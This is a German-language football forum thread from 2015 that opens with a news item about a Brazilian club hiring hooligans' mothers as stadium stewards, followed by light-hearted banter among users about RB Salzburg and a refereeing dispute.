Der Sport-Tag im Ticker: Hooligan-Mütter sorgen in Brasilien für Ordnung im StadionIdee clever, Umsetzung noch besser! Der brasilianische Erstligist SC Recife stellte am Wochenende die Mütter von 30 Hooligans als Sicherheits-Kräfte ein. Erster Einsatz war am Sonntag das Derby gegen Nautico Recife. Um Krawalle zu vermeiden, wurden die Mütter (wie bereits 2014 in Curitiba getestet, s. Bild) eingespannt. Sie trugen Westen mit der Aufschrift “Sicherheitsmutter”. SCR-Präsident Aricio Fortes via globoesporte: „Im Endeffekt will sich niemand schlagen, wenn die eigene Mutter dabei ist.“ Siehe da: Der Plan ging auf, es kam zu keinen Gewaltexzessen!
In Italien würde das vermutlich auch super funktionieren. ;-)
shadow08
11.02.2015, 11:35
will ich wirklich dass Du nicht gegen RB schießt?
Nein !
egal ;-)
wir machen das mit dem Kasten ;-) dann soll da Nido ( Fisch ) Schiedrichter machen den bringen wir dann ins Krankenhaus dann muss sich keiner um jemanden Kümmern :fish::pfeifen::mrgreen::prost:
Stimmt leider auch nicht. ;)
Wir wissen nicht ob es ohne den Fehlern nicht auch dazu gekommen wäre.
Selbst mit den Fehlern von Q. bräuchte ich RB ned hassen wenn die sich richtig verhalten hätten. ;)
Der Nido würd sicher zu viele :fish: mitbringen. :)
Stimmt leider auch nicht. ;)
Wir wissen nicht ob es ohne den Fehlern nicht auch dazu gekommen wäre.
Selbst mit den Fehlern von Q. bräuchte ich RB ned hassen wenn die sich richtig verhalten hätten. ;)
Der Nido würd sicher zu viele :fish: mitbringen. :)
kannst auch ned behaupten weil es in den Sternen steht ;-)
bei dem Blauen schreibst es ja das wir dass nicht wissen Du nicht und ich nicht :-D
bevor Du noch a Zeitreise machst beende ich das Thema für mich :mrgreen:
shadow08
11.02.2015, 12:25
bei dem Blauen schreibst es ja das wir dass nicht wissen Du nicht und ich nicht :-D
bevor Du noch a Zeitreise machst beende ich das Thema für mich :mrgreen:
Zum Abschluss noch bissl aufs i-Tüpfelchen:
DOCH ich kann behaupten dass deine Aussage ned stimmt!
Stimmt leider auch nicht. :wink:
Genau weil die Antwort in den Sternen steht, kann ich behaupten dass deine Aussage ned stimmt. Sie könnte stimmen aber du formulierst sie als Tatsache, somit stimmts ned. ;)
Gibs endlich auf. :-P
Also ich wäre langsam dafür, dass ich Popcorn brauche. ;-)
jaaaaaaaaaaaaaa
für das bin i auch :lol:8-)
shadow08
11.02.2015, 12:33
Glaub das brauchst jetzt nicht mehr, Mane gibt wohl endlich auf. :lol:8-):lol:
Schade. Mist. Also hoffentlich gibts irgendwann eine Forsetzung.
Da dieser Teil schon super war, hoffe ich auf einen Teil 2. ;-)
Von gelungenen 1. Sachen soll man immer einen weiteren machen. Marketingtechnisch ist das eine Pflicht.
shadow08
11.02.2015, 13:18
Von gelungenen 1. Sachen soll man immer einen weiteren machen. Marketingtechnisch ist das eine Pflicht.
Da stehen die Chancen gut für dich denn am Abend könnte vom Stiff wieder was kommen und der termi hat sich bisher eh noch zurückgehlaten, also wer weiß. :lol:
sorry aber i trau mich mal ;-)
muhahahahaha8-)
is eh ganz klar das Dir das gefallen hat ;-)
wie Du festgestellt hast das es hoffnungslos ist hat nur noch mitgelesen und dir eins gegrinst :lol:
shadow08
11.02.2015, 14:15
sorry aber i trau mich mal ;-)
muhahahahaha8-)
is eh ganz klar das Dir das gefallen hat ;-)
wie Du festgestellt hast das es hoffnungslos ist mit den deutschen Kollegen über RB zu diskutieren hast nur noch mitgelesen und dir eins gegrinst :lol:
Du hast da was wichtiges vergessen, habs dir hinzugefügt. ;)
Schön langsam könntest aber selbst auch mal wieder richtige und gscheide Sachen posten. 8-)
Du hast da was wichtiges vergessen, habs dir hinzugefügt. ;)
Schön langsam könntest aber selbst auch mal wieder richtige und gscheide Sachen posten. 8-)
ich hab das extra offen lassen soll doch jeder für sich entscheiden ;-)
i will da keinen eine Meinung aufdrücken :mrgreen:
shadow08
11.02.2015, 14:43
ich hab das extra offen lassen soll doch jeder für sich entscheiden ;-)
i will da keinen eine Meinung aufdrücken :mrgreen:
Würdest mit deinen Argumenten sowieso ned schaffen. :mrgreen::mrgreen::mrgreen:
@Joker :prost:
ich box hier mal kräftig alle nieder :boxing: :boxing: :fish: :mrgreen:
Fang mal in Wien an :mrgreen: und dann boxt du Dich nach Bayern durch ;-) da erwischt eh viel in Ö :-P
wennst in Bayern angekommen bist kannst eh nicht mehr :fish:
shadow08
11.02.2015, 15:16
Fang mal in Wien an :mrgreen: und dann boxt du Dich nach Bayern durch ;-) da erwischt eh viel in Ö :-P
wennst in Bayern angekommen bist kannst eh nicht mehr :fish:
Fang lieber andersrum an weil von München über den Salzburger Dosen-Bereich brauchst keine Gegenwehr erwarten. Nur Dampfplauderer mit Plastik-Klatschen. :lol:
Commander
11.02.2015, 16:30
Wenn ich mir das alles so durchlese muss ich echt laut lachen 8-)
Joker, das ist wirklich pures Kino,mit einem eingefleischten SvSler über RB zu diskutieren :lol::lol::lol:
Made my Day....... :clap2::clap2::clap2::clap2::clap2:
shadow08
11.02.2015, 16:37
Wenn ich mir das alles so durchlese muss ich echt laut lachen 8-)
Joker, das ist wirklich pures Kino,mit einem eingefleischten SvSler über RB zu diskutieren :lol::lol::lol:
Made my Day....... :clap2::clap2::clap2::clap2::clap2:
Ich fass dass jetz mal postiv auf!?!? 8-)
Commander
11.02.2015, 16:38
Ich fass dass jetz mal postiv auf!?!? 8-)
Ja, du kannst es Positiv auffassen
shadow08
11.02.2015, 16:39
Ja, du kannst es Positiv auffassen
Passt, sonst hätt ma den Nido auch noch nach Graz schicken müssen. :lol:
vBulletin® v3.8.4, Copyright ©2000-2025, Jelsoft Enterprises Ltd.